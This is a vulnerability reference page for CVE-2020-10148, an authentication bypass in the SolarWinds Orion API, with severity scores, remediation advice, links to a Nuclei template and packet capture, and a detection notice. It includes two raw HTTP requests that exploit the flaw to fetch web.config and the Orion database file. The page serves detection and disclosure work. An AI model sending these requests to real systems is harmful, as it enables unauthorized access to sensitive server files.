🔙 목록으로 돌아가기

CVE-2020-10148: SolarWinds Orion API - Auth Bypass

TitleSolarWinds Orion API - Auth Bypass
Authordwisiswant0
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the SolarWinds Orion system.
RemediationApply the necessary patches or updates provided by SolarWinds to fix the authentication bypass vulnerability.
CVSS Score9.8
EPSS Score0.94304
CVE IDCVE-2020-10148
CWE IDCWE-287,CWE-288
Tags cve2020 cve solarwinds rce auth-bypass kev vkev vuln

🔍 Vulnerability Description

SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.

🌐 HTTP Request

GET /web.config.i18n.ashx?l=pqnrv&v=pqnrv HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/5.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /SWNetPerfMon.db.i18n.ashx?l=pqnrv&v=pqnrv HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10148.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-10148.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A